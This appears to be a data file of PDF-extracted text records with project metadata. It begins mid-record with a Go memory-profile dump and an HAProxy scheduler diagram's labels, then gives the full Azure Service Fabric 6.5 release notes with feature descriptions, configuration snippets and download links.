(0.87%) 42.53MB\njson\n(*decodeState)\nobject\n0 of 72.14MB (1.44%)\n 18.03MB 7.62MB 29MB\njson\n(*decodeState)\nvalue\n0 of 71.64MB (1.43%) 54.12MB\n 6.50MB\nregistry\n(*Store)\nCompleteWithOptions\n0.50MB (0.01%)\nof 124.09MB (2.48%) 92.07MB 5.50MB\n (inline)\n 112.54MB\n (inline)http\n(*timeoutHandler)\nServeHTTP\nfunc1\n0 of 116.87MB (2.34%)\n 116.87MBvalidation\nSchemaHas\n35.02MB (0.7%)\n512B 35.02MB\nreflect\ncvtBytesString\n52MB (1.04%)\n 76.94MB\njson\nmapEncoder\nencode\n1.29MB (0.026%)\nof 88.72MB (1.77%) 6.18MBjson\nstructEncoder\nencode\n0 of 88.21MB (1.76%) 80.33MBwait\nUntil\n0 of 95.78MB (1.92%)\n 95.78MBapiextensions\n(*JSONSchemaProps)\nDeepCopy\n29.63MB (0.59%)\n512B 29.01MB\n 80.33MBaggregator\n(*inMemoryResponseWriter)\nWrite\n42.55MB (0.85%)\n42.55MB 42.55MBapp\nRun\n0 of 65.36MB (1.31%)\nbuilder\nBuildOpenAPISpec\n0 of 30.04MB (0.6%) 7.02MB\ncontrolplane\ncompletedConfig\nNew\n0 of 47.56MB (0.95%) 47.56MB\npprof\n(*profileBuilder)\nappendLocsForStack\n0 of 28.17MB (0.56%) 28.17MB\n 5.68MB 82.54MB 685.43MB\n 319.47MB 42.55MB 8.51MB\n 52MByaml%2ev3\n(*parser)\nscalar\n25MB (0.5%)\n16B 8MB\nspec\n(*StringOrArray)\nUnmarshalJSON\n18.50MB (0.37%)\nof 26MB (0.52%) 26MBruntime\nmain\n0 of 48.02MB (0.96%)\n 41.60MB 103.94MB\n 18.01MB 23.03MB\n 420.82MB 30.02MB 71.64MB\n 7.50MB 16B 18.50MByaml%2ev3\n(*parser)\nparse\n0 of 25MB (0.5%)\n 25MB\n 66.81MB\nhandler\n(*cache)\nGet\n0 of 128.48MB (2.57%) 128.48MB\n 125.72MB" } ]
{ "category": "Orchestration & Management", "file_name": "sched.pdf", "project_name": "HAProxy", "subcategory": "Service Proxy" }
[ { "data": "Most UrgentGlobal\ntasks\n(locked)tasksLocal\n(locked)timersGlobal\ntimersLocalLocal ?\nYes NoLocal ?\nYes NoClass?\npastfuturepastfuture\nOldestnewest\noldest\nnewest\noldest\nrunqueue−depthrunqueue−depthTime−based\nWait queues\n− 1 global\n− 1 per threadPriority−based\nRun queues\n− 1 global\n− 1 per threadtask_wakeup() task_schedule()task_queue()\ntasklet_wakeup() t−>process()Run!\n37%\n=1(accessed using atomic ops)\n50%\n13%YesLocal ?\nNo\nTASK_SELF_WAKING\nTASK_HEAVY(default)In I/O or signals\nMost UrgentorderScan\n5 class−based tasklet queues per thread (one accessible from remote threads)TL_URGENT\nTL_NORMAL\nTL_BULK\nTL_HEAVYSHARED" } ]
{ "category": "Orchestration & Management", "file_name": "Service_Fabric_ReleaseNotes_65.pdf", "project_name": "Azure Service Fabric", "subcategory": "Scheduling & Orchestration" }
[ { "data": " \n Microsoft Azure Service Fabric 6.5 Release Notes \nThis release includes the bug fixes and new features described in this document. This release includes runtime, SDKs , Service Fabric Tool and \nWindows Server Standalone deployments to run on -premises. \nThe following packages and versions are part of this release \nService Fabric Runtime Ubuntu 6.5.435.1 \nWindows 6.5.639.9590 \nService Fabric for Windows \nServer Service Fabric Standalone Installer Package 6.5.639.9590 \n.NET SDK Windows .NET SDK 3.4.639 \nMicrosoft.ServiceFabric 6.5.639 \nReliable Services and Reliable Actors 3.4.639 \nASP.NET Core Service Fabric integration 3.4.639 \nJava SDK Java for Linux SDK 1.0.5 \nService Fabric PowerShell and \nCLI AzureRM PowerShell Module 0.3.15 \nSFCTL 8.0.0 \nService Fabric Tooling Visual Studio Tooling 2.4.11116.1 \nEclipse Tooling 2.0.7 \n \n Contents \nMicrosoft Azure Service Fabric 6.5 Release Notes ................................ ................................ ................................ ................................ ....................... 1 \nBreaking Announcements ................................ ................................ ................................ ................................ ................................ .............................. 3 \nWhat N ew in 6.5 ................................ ................................ ................................ ................................ ................................ ................................ ............ 4 \nNew Features ................................ ................................ ................................ ................................ ................................ ................................ ............. 4 \nService Fabric Runtime ................................ ................................ ................................ ................................ ................................ ................................ .. 5 \nService Fabric .NET SDK ................................ ................................ ................................ ................................ ................................ ............................... 14 \nService Fabric PowerShell and CLI ................................ ................................ ................................ ................................ ................................ ............... 15 \nRepositories and Download Links ................................ ................................ ................................ ................................ ................................ ............... 16 \nVisual Studio 2015 Tool for Service Fabric – localized download links ................................ ................................ ................................ ................. 19 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n Breaking Announcements \n• This is the last release where we are releasing the Visual Studio tools for Service Fabric for VS 2015. Customers are \nadvised to move to VS 2019 . \n• Protecting system entities from runaway 'user' code : From this version, users can now set up resource protection \nbetween the system and user services on a node. Service Fabric will enforce these hard resource limits for user services to \nguarantee that all the non -system services on a node will never use more than the specified amount of resources. Please \nrefer to this section for configuration details . \n What New in 6.5 \nThis release includes supportability, reliability, performance improvements, new features, bug fixes and enhancements to ease cluster \nand application life cy cle management. \n New Features \n• Service Fabric Explorer will now allow you to explore the applications that you have uploaded to image store. \n• Patch Orchestration Application(POA) customers are recommended to move to released version 1.4.0 that has a lot of self -\ndiagnostic improvements. \n• EventStore Service will be enabled by default f or clusters from this release unless a customer has specifically opted out. \n• Add replica level service fabric heal th events for Stateful Services \n• Users will have better visibility into state of down seed nodes. \n• Service Fabric Application Disaster Recovery tool allows users of Service Fabric stateful services to get back live soon in case \nthe primary SF cluster encounters a disaster. The tool constantly synchronizes the data from the application running on the \nprimary cluster on the standby application on secondary using periodic backup and restore. \n• Support for .NET Core applications built from Visual Studio to be published to Linux Service Fabric cluster . \n• Azure Service Fabric CLI (sfctl) will be installed automatically from 6.5 onwards when you upgrade or create new Azure \nService Fabric Linux cluster . \n• SFCTL is installed by default on MacOS/Linux OneBox cluster . \n Service Fabric Runtime \n \nVersions IssueType Description Resolution \nUbuntu 6.5 \nWindows \n6.5 \n \n Feature Improve reliable collection replicator \nretry logic \n \n Brief desc: When there is network congestion or if secondary is slow in receiving messages, \nreplicator would still try to flood the secondary with retries . This can exacerbate the problem . \nThis feature improves the replicator retry mechanism. \nHow/When to Consume it: Feature is enabled by default \nWindows \n6.5 Bug FabricInstallerSvc no longer writes a \ndump when timing out as part of it \nretry loop starting FabricHost. Impact : Excess noise for cluster health telemetry and unnecessary network usage when Fabric is \nnot coming up. \nFix: Change logic to do silent retry . \nUbuntu 6.5 \nWindows \n6.5 Bug Made performance improvements for \nscalemin (onebox/more nodes than \nmachines) scenario cluster setup and \nreset, by avoiding unnecessary file \ncopies. Impact : SDK single machine or scalemin clusters previously had their own set of copies for \nFabric service files for legacy reasons , resulting in slow cluster setup. \nFix: This was reworked to deprecate the need for each node to have its own set of copies of \nservice files. \nGitHub link: https://github.com/Microsoft/service -fabric/issues/299 \nUbuntu 6.5 \nWindows \n6.5 Bug In container setup code for Service \nFabric runtime deployment, have \nremoved waits and retries where they \nare not necessary. Impact : Container configuration setup is behaving slowly for Service Fabric node setup & SDK \nupgrad e. \nFix: Improve granularity checking result codes for certain functional calls, to remove \nunnecessary waits. \nWindows \n6.5 Feature SDK Service Fabric runtime installer \nnow takes /force fla g to automatically \nclose conflicting processes. Brief desc: For advanced users installing the SF runtime for the SDK setup scenario using the \ncommand line, can now pass /force flag to automatically close conflicting processes during the \nupgrade. Note: This does not apply for Windows system services. \nIn addition, when not using the /force or /quiet flags, a modal dialog is presented to offer this \nfunctionality on demand , such as when installing through WebPI . \nHow/When to Consume it: Using the runtime installer exe retrieved from WebPI/direct link , \nprovide the new parameter through command line interface. \nWindows \n6.5 Feature SDK Service Fabric runtime installer \nnow takes /uninstall parameter for \neasy command -line uninstallation. Brief desc: To bring parity with functionality available in the previously deprecated MSI \ninstaller, the SF runtime installer exe now takes an /uninstall parameter. \nHow/When to Consume it: Using the runtime installer exe retrieved from WebPI/direct link, \nprovide the new parameter through command line interface. \nWindows \n6.5 Bug Fixed crash during node state \nremoval . Impact : In the cluster node removal path, i n rare case s, calling NetCloseResource would hit a \ncrash which had a risk of leaving artifacts behind during uninstall. \nFix: Fixed marshaling casting issue that led to Arithmeth ic OverflowException. \n Ubuntu 6.5 \nWindows \n6.5 \n Feature Change compose application \ndeployment to use the same workflow \nand store data structures with mesh \napplication deployment in Cluster \nManager. How/When to Consume it: \nWhen cluster upgrade to version 6.5, compose deployments old data structures will be removed \nand new data structures will be generated. Only completed compose deployments are migrated. \nTo migrate successfully, cluster upgrade ( from last 6.4 refresh release to 6.5 and 6.5 to lower \nversion) and operations on compose based applications (create/upgrade/delete) are mutually \nblocking to each other. Fabric upgrade to 6.5 will fail if there is an operation on compose \napplication not completed, and vice versa. To hav e this blocking logic, users of compose \ndeployments must upgrade to 6.4 CU7 first and then upgrade to 6.5. Cluster upgrade that not \nacross 6.5 will not be affected. \n \nThe migration of compose applications is one way. If cluster is in 6.5 and then upgraded to a \nlower cluster version such as 6.4, migrated and newly created compose applications are still \nrunning but cannot be operated in lower cluster version. It is only changed internally. There are \nno visible public API changes. This change does no t impact mesh application deployment. \nUbuntu 6.5 \nWindows \n6.5 \n Bug Accept new application upgrade if a \nprevious application rollback fails during \nupdating default services Impact : If an application rollback fails when updating default services, a new application \nupgrade on the same application will fail. \nFix: Fix to accept a new application upgrade if previous application rollback fails during \nupdating default services. \nUbuntu 6.5 Bug Service Fabric clusters on Azure can now \nbe deployed using custom DNS. Impact: Customers detailing a custom DNS server in their networking dhcpOptions would have a \ncluster fail to come up since Azure machine addresses cannot be resolved with the DNS server. \nThe workaround was to add all cluster node address entries to the machine hosts files, to act as a \nstop gap. \nHow/When to Consume it: To activate custom DNS through an ARM Azure Service Fabric \ndeployment, this configuration is required under ARM Microsoft.Network/virtualNetworks \nproperties section (/w your chosen dns ip): \n \"dhcpOptions\": { \n \"dnsServers\": [ \n \"8.8.8.8\" \n ] \n } \nUbuntu 6.5 Feature General machine bootstrap script has \nbeen provided to set up prerequisites for \nService Fabric Linux nodes for \ndeployment & upgrade scenarios Brief desc: A common machine prerequisite setup script bootstrap.sh has been made available, in \nsync for each relea se of the SF runtime deb package. This allows for a consistent and future -proof \nprerequisite setup and upgrade process for Azure and on -premises Service Fabric Linux nodes. \nIt sets up: \n1. Base environmental packages \n2. External dependency package repositories \n3. Service Fabric CLI (sfctl) \nHow/When to Consume it: Azure -deployed Service Fabric machines carry a script in the VM \nextension which is used to invoke the boo tstrap script by deriving it from the deb package. The \n helper script is called run_b ootstrap.sh and the extension package can be retrieved from link: \nhttps://go.microsoft.com/fwlink/?linkid=2092882 \nUbuntu 6.5 \n(& MacOS) Feature SFCTL is installed by default on \nMacOS /Linux dev experience cluster \ncontainer Brief desc: When creating a container using the latest Service Fabric base container \nmicrosoft/service -fabric -onebox , the setup script will bootstrap the machine with sfctl installed \nautomatically, removing the need to run separate steps to install the CLI. \nHow/When to Consume it: MacOS /Linux dev container setup for container -based local cluster : \nhttps://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -mac \nWindows \n6.5 Feature EventStore Service will be added by \ndefault to Windows clusters when \nruntime gets upgraded to a version >= \n6.5. Brief desc: When clusters get created or upgraded with versions >=6.5, the EventStore Service is \nenabled by default. If a customer wants to disable it, this can be achieved by setting the \neventStoreServiceEnabled property on the cluster resource to false (API version for cluster \nresource should be updated to 2019 -03-01). \nhttps://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -diagnostics -eventstore \nWindows \n6.5 Feature Validation should not allow users to \nspecify CPU shares without specifying \nnumber of required cores Brief desc: With new validation during application manifest registration, Service Fabric does not \nallow specifying CPU shares at a code package/container level without setting the number of \ncores that is required. Reasoning behind this is that shares are used to split CPU time between \ndifferent code packages/containers on the same machine. \nIf customer already has an application where CPU shares are specified on code package level, but \nno CPU cores on service package level, this application will work with new fabric version. \nCustomers must change the application manifest and add CPU cores on service package level to \nsuccessfully upgrade their apps with newer service fabric versions . \nWindows \n6.5 Feature Add replica -level Service Fabric Events \nto be used with Reliable Collections. Brief desc: Added replica -level Service Fabric Events for Reliable Collections . \nHow/When to Consume it: Explained in the first paragraph in: https://docs.microsoft.com/en -\nus/azure/service -fabric/service -fabric -diagnostics -event -generation -operational \nDocumentation: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -\ndiagnostics -event -generation -operational #replica -events \nWindows \n6.5 \nUbuntu 6.5 Bug Improve error reporting when a code \npackage terminates unexpectedly. Service Fabric would provide a health message that included only an error code when a Code \nPackage terminated. It was difficult for users to know why their process/container terminated and \ntake action to fix it. Service Fabric will now display a more descr iptive health message with \ngeneral debugging tips when a Code Package terminates. It will also include a link to more \nspecific debugging information for common termination error codes. \nWindows \n6.5 \nUbuntu 6.5 Bug Move sf_cns plugin to a different port. \n The sf_cns plugin runs on port 10090 (cns) and 48080 (cnm) by default. Teams are also using the \nazure cns plugin from GitHub that also runs on 10090 and 48080. Providing configuration -based \nsupport to run the sf_cns plugin on a different ports. The configuration controlling the sf_cns \nplugin ports are Hosting/SfCnsNetworkPluginCnsUrlPort (default is 10091) and \nHosting/SfCnsNetworkPluginCnmUrlPort(default is 48081). \n Windows \n6.5 \nUbuntu 6.5 \n Bug Fixed Reverse Proxy crash of malformed \nURLs requests Prior to 6.3 Reverse sf event would return 400 BadRequest, recently Reverse Proxy will crash if it \nreceives a malformed request. This behavior was fixed such that it will again return 400 even if \nthe URL is malformed. \nWindows \n6.5 \n Feature Provide option to send telemetry on API \nusage through HTTP Gateway Brief desc: API calls going through the HTTP endpoint can be collected as part of telemetry. \nInformation may contain request URL, whether the operation was successful, error message, and \nthe type of client the request came from, such as sfctl. \nHow/When to Consume it: Feature is disabled by default. Feature can be turned on in the \nDiagnostics sections of FabricSettings, with configurations CaptureTelemetry and \nTelemetryCapturePercentage. \nWindows \n6.5 \nUbuntu 6.5 Bug DeletionManager should delete \nchecksums first and fail if not able Brief Desc: DeletionManager deletes part of a code package and errors out before it's able to \nfinish (the deletion can fail on the OS side if it can't delete on of the files in the folder) . The \nchecksum remains along with part of the code package. If that ApplicationType is re -provisioned, \nthen DownloadManager will see the checksum and that the folder is still there and not overwrite \nit. SF will now try to bring up an application with a hal f-missing code package. \nFix: Fixed an issue where deleting files from a node would leave the cache in an error state \nWindows \n6.5 \nUbuntu 6.5 Bug Users can now specify a \n\"TreatContainerUnhealthyStatusAsError\" \nflag in the HealthConfig object of their \nContainerHostPolicies. Users can now specify a \"TreatContainerUnhealthyStatusAsError\" flag in the HealthConfig object \nof their ContainerHostPolicies. W hen set to true, any unhealthy statuses reported from a \ncontainer's configured HEALTHCHECK will be treated as an error in Service Fabric's health \nreports. \nWindows \n6.5Ubuntu \n6.5 Bug Fixed an issue causing externally \nterminated containers to be cleaned \nregardless of an AutoRemove policy. Brief desc: \nIf a container crashed or was terminated externally, we shouldn't remove the container. Whether \nthe container is removed should be set during activation. \n \nWindows \n6.5Ubuntu \n6.5 Bug ImageCache should clean up numbered \ntemporary files on failed download Brief Desc: Customer is reporting they're seeing a buildup of temporary download files in \nImageCache. These files are created while being downloaded with a temporary name, and then \nrenamed after download is complete. The files the customer is seei ng are slightly smaller than \ntheir code package, leading me to believe they are an artifact left due to a failed download. \nFix: Fixed an issue where temporary files were being left in the ImageCache after a failed \ndownload. \n \nWindows \n6.5 \nUbuntu 6.5 Feature Auditing f unctionality added t o REST \napi's Brief desc : Information about the http requests ( REST api’s) will be logged to a well-known \nETW channel under the SF Operational channel with keyword audit. This audit is configurable to \nturn on or off, only actions from users with admin credentials will be logged, and requests failed \ndue to authentication will be ignored. The audit will include the credentials being presented, along \nwith the request url and body. \n \n How/When to Consume it: Feature is disabled by default. Feature can be turned on in the \nDiagnostics sections of FabricSettings, by setting the configuration AuditHttpRequests to true. \n \nRemoting \nSDK 6.5 Bug Default Retry settings updated Brief desc: \nWe have changed the default retry settings for FabricTransientExceptions for Remoting from max \nto 10. Users will see FabricTransientExceptions and hence they need to handle those from this \nrelease onwards. \nWindows \n6.5 \nUbuntu 6.5 Feature New REST API to support querying \nimage store folder size. Brief desc: \nService Fabric REST API support to return folder size in ImageStore. This REST API help SF \nexplorer show folder information in ImageStore viewer tab. A user can see which folder consume \nlarge amount of space in storage and cleans up accordingly. \n/ImageStore/{contentPath}/$/FolderSize \nDocumentation : https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -\nvisualizing -your-cluster#image store -viewer \nWindows \n6.5 \nUbuntu 6.5 \n Bug Resource governance validation should \nnot allow users to specify CPU shares on \ncode package level without specifying \nthe number of required cores on service \npackage level Brief desc: \nWith new validation during application manifest registration, Service Fabric does not allow \nspecifying CPU shares a t a code package/container level without setting the number of cores that \nis required. Reasoning behind this is that shares are used to split CPU time between different code \npackages/containers on the same machine. \nIf customer already has an application where CPU shares are specified on code package level, but \nno CPU cores on service package level, this application will work with new fabric version. \nCustomers must change the application manifest and add CPU cores on service package level to \nsuccessfully upgrade their apps with newer service fabric versions. \nWindows \n6.5 Feature SF trace logs format changed to be CSV \ncompliant SF trace logs are made CSV compliant by enclosing message by double quotations after escaping \n(escape character: \") existing double quotations in the message. Custom tools developed by users \nthat have a dependency on these logs need to modify the tools accordingly. \n Example : \nPrevious trace in log file: \n2019 -5-15 01:47:48.091,Warning,1896,1756,Transport.FailedToConnect@68b5725aa0,client -\n10.0.0.11:19000/10.0.0.11:19000: error = 2147943625, failureCount=9. Filter by \n(type~Transport.St && ~\"(?i)10.0.0.11:19000\") to get listener lifecycle. Connect failure is \nexpected i f listener was never started, or listener/its process was stopped before/during \nconnecting. \nCurrent : \n2019 -5-15 01:47:48.091,Warning,1896,1756,Transport.FailedToConnect@68b5725aa0,\"client -\n10.0.0.11:19000/10.0.0.11:19000: error = 2147943625, failureCount=9. Filter by \n(type~Transport.St && ~\"\"(?i)10.0.0.11:19000\"\") to get listener lifecycle. Connect failure is \n expected if listener was never started, or listener/its process was stopped before/during \nconnecting. \nWindows \n6.5 \nUbuntu 6.5 \n Feature Protecting system entities from \nrunaway 'user' code Few customers encountered problems due to runaway user services consuming all the resources \non Service Fabric nodes. The resource exhaustion (spinning CPU, memory exhaustion, \nhammering disk IO, disk space exhaustion) resulted in several bad effects including starving other \nservices on the nodes, nodes ending up in a bad state, complex mitigation and recovery steps, and \nunresponsive cluster management APIs. \n \nWith this version of Service Fabric, you can now set up resource protection between the system \nand user services on a node. Service Fabric will enforce these hard resource limits \nfor user services to guarantee that all the non -system services on a node will never use more than \nthe specified amount of re sources. \n \nThis release adds an additional configuration option: EnforceUserServiceMetricCapacities. This \nconfig is in the PlacementAndLoadBalancing section of your ClusterManifest/ClusterConfig, and \nis OFF by default (to prevent unexpected surprises for e xisting customers during upgrades). \n \n<Section Name =\"PlacementAndLoadBalancing\" > \n<Parameter Name =\"EnforceUserServiceMetricCapacities\" Value =\"true\" /> \n</Section> \n \n{ \n\"name\" : \"PlacementAndLoadBalancing\" , \n \"parameters\" : [ { \n\"name\" : \"EnforceUserServiceMetricCapacities\" , \n\"value\" : \"true\" } ] \n} \n \nThis feature depends on Node Capacities for the Service Fabric resource governed \nhttps://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -resource -governance metrics \n(as of this writing Memory and CPU Cores) being set. These capacities can be set either \nautomatically ( AutoDetectAvailableResources flag is false) or manually. If no capacities are set, \nthe node is considered to have infinite capacity for the given metric, and hence this feature cannot \nbe used (since SF doesn't know how much resources to reserve for system services). \nSF will issue a health warning if \"EnforceUserServiceMetricCapacities\" is true but capacities are \n not specified. \n \nThe specified metric capacity for the node is then divided between the user serv ices defines and \nthe rest of the system. The amount dedicated to the user services vs. the amount dedicated to the \nsystem is controlled by the following settings: \n<Section Name =\"PlacementAndLoadBalancing\" > \n<!-- 0.0 means 0%, and 1.0 means 100% --> \n<Parameter Name =\"CpuPercentageNodeCapacity\" Value =\"0.8\" /> \n<Parameter Name =\"MemoryPercentageNodeCapacity\" Value =\"0.8\" /> \n</Section> \n \nThese ratios are defined by default. By default 80% of node capacity is used for user \nservices and 20% will be left to allow enough resources for the SF system \nservices (and also for any other processes/apps running on the node that are not visible to SF). \nThese settings are static and upgrades to change them will require node restarts. User service \ncapacity is enforced only for governed SF metrics (Memory and CPU Cores as of this writing). \nFor non -governed metrics, it's treated as a soft guarantee (violations are possible, but if they \nhappen, load balancer will trigger and attempt to fix the violation by moving services around, just \nlike normal capacity violations). The SF system services are effectively ungoverned , and they \ncan go beyond of their quota. Effectively constraining the system components and preventing \nthem from growing beyond their allotment will be handled in an upcoming release. \n \n \nWith this change, user services metric capacity can also be defined per Node Type. T At the \nNodeType level, a new section is added named UserServicesMetricCapacity. Within this section, \nthe same setting names and behavior can be defined and will result in the same behavior as \ndescribed for the Cluster Manifest level settings. If metric capacity is defined in both places, node \ntype definition takes precedence. \n<NodeTypes> \n<NodeType Name =\"NodeType0\"> \n<UserServicesMetricCapacity> \n<Parameter Name =\"CpuPercen tageNodeCapacity\" Value =\"0.5\"/> \n<Parameter Name =\"MemoryPercentageNodeCapacity\" Value =\"0.7\"/> \n </UserServicesMetricCapacity> \n</NodeType> \n</NodeTypes> \n \nThis release also fixes an issue in the calculation of node capacities. The rule for calculating \ncapacity has changed to account for percentage value ( User Services Capacity = \nNode Capacity * User Services Capacity Percentage ) \n \nPreviously, if user provided an override value for node capacity in NodeType, the % value was \nignored. This could be surprising to some users. \n Scenario 1 Scenario 2 Scenario 3 Scenario 4 \nNode \ncapacity \nauto-\ndetected \nvalue 100 100 100 100 \nNode \ncapacity \nuser \noverride - 90 - 90 \nUser \nservices \ncapacity \ndefault in \ncluster \nmanifest 0.7 0.7 0.7 0.7 \nUser \nservices \ncapacity \ndefault in \nNode Type - - 0.5 0.5 \nUser \nservices \ncapacity - \nactual value 70 90 50 90 \n \n \n \n With this release, if user provides an override for the absolute capacity in NodeType, the % value \nis NOT ignored, and will further discount the available resources on the node. \n \n Scenario 1 Scenario 2 Scenario 3 Scenario 4 \nNode \ncapacity \nauto-\ndetected \nvalue \n 100 100 100 100 \nNode \ncapacity \nuser \noverride \n - 90 - 90 \nUser \nservices \ncapacity \ndefault in \ncluster \nmanifest \n 0.7 0.7 0.7 0.7 \nUser \nservices \ncapacity \ndefault in \nNode Type \n - - 0.5 0.5 \nUser \nservices \ncapacity - \nactual value \n 70 63 50 45 \n \n Service Fabric .NET SDK \n \n \n \n Reliable Services and Reliable Actors X.Y.Z \n Feature Added replica -\nlevel Service \nFabric Events to \nbe used with \nReliable \nCollections and \nKeyValueStore. \n \n Brief desc: Added replica -level Service Fabric Events for stateful services. \nHow/When to Consume it: Explained in the first paragra ph in: \nhttps://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -\ndiagnostics -event -generation -operational \nDocumentation: \nhttps://docs.microsoft.com/azure/service -fabric/service -fabric -\ndiagnostics -event -generation -operational#replica -events \n \n Service Fabric PowerShell and CLI \n \n Versions IssueType Description Resolution \nSFCTL 8 \n Feature As of Service Fabric on \nLinux 6.5 in Azure, sfctl is \ninstalled on machines by \ndefault. \n \n Brief desc: Latest version SFCTL is installed o n Service Fabric on Linux \nmachines when creating a new cluster or upgrading a cluster to 6.5. \nHow/When to Consume it: Automatic. \nhttps://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -cli \n \n Repositories and Download Links \nThe table below is an overview of the direct links to the packages associated with this release. \nFollow this guidance for setting up your developer environment: \n• Linux: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -linux \n• Mac: https://do cs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -mac \n• Windows: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started \nArea Package Version Repository Direct Download Link \nService \nFabric \nRuntime Ubuntu Developer Set -up 6.5.435 .1 N/A Cluster Runtime: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefab\nric/pool/main/s/servicefabric \nService Fabric SDK for local cluster \nsetup: \nhttps://apt -\nmo.trafficmanager.net/repos/servicef\nabric/pool/main/s/servicefabricsdkco\nmmon/ \nContainer image: \nhttps://hub.docker.com/r/microsoft/ser\nvice-fabric -onebox/ \nService \nFabric \nRuntime Windows Developer Set -up 6.5.639.9590 N/A https://download.microsoft.com/downl\noad/C/7/B/C7B7BA41 -B95A -4363 -\n8B28 -\n7075E9B10E99/MicrosoftServiceFabri\nc.6.5.639.95 90.exe \nService \nFabric for \nWindows \nServer Service Fabric Standalone \nInstaller Package 6.5.639.9590 \n N/A https://download.microsoft.com/downl\noad/8/3/6/836E3E99 -A300 -4714 -\n8278 -\n96BC3E8B5528/6.5.639.9590/Microso\nft.Azure.ServiceFabric.WindowsServe\nr.6.5.639.9590.zip \n Area Package Version Repository Direct Download Link \nService \nFabric for \nWindows \nServer Service Fabric Standalone \nRuntime 6.5.639.9590 N/A https://download.microsoft.com/downl\noad/B/0/B/B0BCCAC5 -65AA -4BE3 -\nAB13 -\nD5FF5890F4B5/6.5.639.9590/Microso\nftAzureServiceFabric.6.5.639.9590.cab \n.NET SDK Windows .NET SDK 3.4.639 N/A https://download.microsoft.com/downl\noad/C/7/B/C7B7BA41 -B95A -4363 -\n8B28 -\n7075E9B10E99/MicrosoftServiceFabri\ncSDK.3.4.639.msi \n.NET SDK Microsoft.ServiceFabric 6.5.639 N/A https://www.nuget.org \n.NET SDK Reliable Services and \nReliable Actors \n• Microsoft.ServiceFa\nbric. Services \n• Microsoft.ServiceFa\nbric.Services.Remoti\nng \n• Microsoft.ServiceFa\nbric.Services.Wcf \n• Microsoft.ServiceFa\nbric.Actors \n• Microsoft.ServiceFa\nbric.Actors.Wcf 3.4.639 https://github.com/Azure/service -\nfabric -services -and-actors -dotnet https://www.nuget.org \n.NET SDK ASP.NET Core Service \nFabric integration \n• Microsoft.ServiceFa\nbric.Services.AspNe\ntCore.* 3.4.639 https://github.com/Azure/service -\nfabric -aspnetcore https://www.nuget.org \n Area Package Version Repository Direct Download Link \n.NET SDK Data, Diagnostics and Fabric \ntransport \n• Microsoft.ServiceFa\nbric.Data \n• Microsoft.ServiceFa\nbric.Data.Interfaces \n• Microsoft.ServiceFa\nbric.Diagnostics.Inte\nrnal \nMicrosoft.ServiceFabric.Fab\nricTransport.Internal 3.4.639 N/A https://www.nuget.org \n.NET SDK Microsoft.ServiceFabric.Dat\na.Extensions 1.4.639 N/A https://www.nuget.org \n \nJava SDK Java SDK 1.0.5 N/A https://mvnr epository.com/artifact/com\n.microsoft.servicefabric/sf -actors/1.0.5 \nVisual \nStudio Visual Studio 2017 Tools for \nService Fabric 2.4.11024.1 N/A Included in Visual Studio 2017 Update \n7 (15.7) and above \n Visual Studio 2015 Tools for \nService Fabric 2.4.11116.1 N/A See localized download links below \nEclipse Service Fabric plug -in for \nEclipse 2.0.7 N/A N/A \nYeoman Azure Service Fabric Java \ngenerator 1.0.7 https://github.com/Azure/generator\n-azuresfjava N/A \nYeoman Azure Service Fabric C# \ngenerator 1.0.9 https://github.com/Azure/generator\n-azuresfcsharp N/A \nYeoman Azure Service Fabric guest \nexecutables generator 1.0.1 https://github.com/Azure/generator\n-azuresfguest N/A \nYeoman Azure Service Fabric \nContainer generators 1.0.1 https://github.com/Azure/generator\n-azuresfcontainer N/A \nCLI Service Fabric CLI 8.0.0 https://github.com/Azure/service -\nfabric -cli https://pypi.python.org/pypi/sfctl \nPowerShell AzureRM.ServiceFabric 0.3.15 https://github.com/Azure/azure -\npowershell/tree/preview/src/Resou\nrceManager/ServiceFabric https://www.powershellgallery.com/pa\nckages/AzureRM.ServiceFabric/0.3.15 \n \nVisual Studio 2015 Tool for Service Fabric – localized download links \nNOTE: The below download links are for the 2.4.11116.1 release of Visual Studio 2015 Tools for Service Fabric. \n \nhttps://download.microsoft.com/download/C/7/B/C 7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.de -de.msi \nhttps://download.mic rosoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.en -us.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.es -es.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.fr -fr.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.it -it.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.ja -jp.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.ko -kr.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFabricTools.VS140.ru -ru.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E99/MicrosoftAzureServiceFab ricTools.VS140.zh -cn.msi \nhttps://download.microsoft.com/download/C/7/B/C7B7BA41 -B95A -4363 -8B28 -7075E9B10E 99/MicrosoftAzureServiceFabricTools.VS140.zh -tw.msi " } ]
{ "category": "Orchestration & Management", "file_name": "curp.pdf", "project_name": "Xline", "subcategory": "Coordination & Service Discovery" }
